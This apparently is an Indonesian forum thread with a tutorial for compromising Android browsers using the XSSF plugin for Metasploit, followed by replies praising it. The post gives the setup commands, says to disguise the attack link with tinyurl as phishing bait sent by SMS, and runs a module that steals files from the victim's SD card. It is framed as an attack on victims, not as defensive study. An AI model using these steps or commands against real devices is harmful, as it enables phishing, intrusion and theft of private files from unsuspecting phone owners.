Exploit Android Menggunakan Xssf

**sonyrimawan** · 11-24-2013, 07:52 AM

halo semua selamat pagi Big Grin

di minggu yang cerah ini saya akan nyepam dikit. mohon jangan di masukin hati kalau ada yang kurang berkenan nanti ya :-bd
kalau misalnya sudah pernah ada yang posting saya minta maaf ya, jujur pada saat saya melakukan pencarian di forum tidak di temukan thread yang sama.

Spoiler! :

kalau begitu langsung saja kita buka kali linux, backtrack, bugtraq, atau apapun yang penting bisa di pasang msfconsole ya.

langsung download dulu xssf pada directory msfconsolenya.

Quote:svn export http://xssf.googlecode.com/svn/trunk ./ --force

Spoiler! :

setelah itu kita jalankan metasploit kita \m/

Quote:msfconsole
dan isikan
load xssf Port=80 Uri=/Xssf/ Public=true Mode=Verbose

Spoiler! :

lalu masukan

Quote:xssf_urls

maka akan muncul penampakan seperti ini

Spoiler! :

di atas itu adalah beberapa link yang merupakan ip dari attacker yang bisa di sembunyikan dengan tinyurl dll sebagai umpan pishing dan xssf home attacker dimana attacker bisa melihat log dari korban.

sekarang lihat msfconsole kita, dan copy link di sebelah [+] XSSF logs page dan paste ke web browser kesayangan anda.

Spoiler! :

maka akan muncul pemandangan seperti itu.

sekarang lihat lah bagian [+] XSSF test page dan copy link di sampingnya, lalu paste kirimkan ke android target anda lewat sms atau apapun. bisa di tutup menggunakan tinyurl atau semacamnya.
karena saya tidak punya android, maka saya pake vbox saja ya =))

Spoiler! :

pada saat korban membuka link tersebut maka koban akan menyaksikan pemandangan seperti ini

Spoiler! :

dan kita akan mendapatkan pemandangan seperti ini

Spoiler! :

new victim registered. tandanya korban sudah tersambung dengan msfconsole kita, sekarang kita buka browser milik kita yang sudah di buka link xssf tadi. maka akan muncul log dari si korban

Spoiler! :

tinggal klik saja tulisan victimnya.

sekarang coba saja kita ketik

Quote:xssf_information 1

tadaaa. nongol dah tuh infonya si korban.

Spoiler! :

sekarang android sudah resmi kena exploit, dan sekarang giliran kita untuk berkreasi mau di apakan android tersebut.
dengan:

Quote:search auxiliary/xssf

mau curi filenya?
bisa dengan memilih:

Quote:use auxiliary/xssf/public/android/steal_sdcard_file

Spoiler! :

dan run

Spoiler! :

dan secara otomatis android korban mengaksesnya dan nantinya akan muncul di log browser kita.

Spoiler! :

tapi berhubung android saya tidak ada isinya karena hanya virtual, jadi kagak muncul apa".

silahkan di kembangkan sendiri dan bila ada yang lebih asik, silahkan di postingkan ke forum.

mohon maaf kalau ada yang kurang berkenan. hanya share saja semoga bermanfaat \m/

**aristateles**$ · 11-24-2013, 08:08 AM

Yes I love backtrack, hihihi #ketawaJahat

**sonyrimawan** · 11-24-2013, 08:16 AM

(11-24-2013, 08:08 AM)aristateles Wrote: Yes I love backtrack, hihihi #ketawaJahat

huwkwkkwk wah bahaya nih untung hapeku nokia 3315 =))

**wine trochanter** · 11-24-2013, 09:58 AM

itu pake ip publik ato gmna pak?
mau tes andro ane nih Big Grin

**sonyrimawan** · 11-24-2013, 10:02 AM

pake ip publik bisa om. test aja. sesuaikan saja dengan ppp0 ente pak di ifconfig Big Grin

**child** · 11-25-2013, 02:59 AM

ini baru namanya hacker :-bd
mantap bang tutornya :apn:

**fl4zero** · 11-25-2013, 11:51 AM

Nice tutor... penarasan pengen nyoba, tapi hape ane tigatigalimablas... :v

**achmad_zzz** · 11-25-2013, 12:00 PM

nambah ilmu nih.. boleh2 nih di coba, tapi ane kuliah dulu ya, hehe.. tahnks

**owie** · 11-25-2013, 06:32 PM

juoss gandoss om,, hehe
ntar coba2 deh,, jadi penasaran Big Grin

**Kresna** · 11-26-2013, 01:21 AM

wihh om sony makin ganteng aja nih Big Grin

.. Nice tutornya om , cek lemari kulkas Big Grin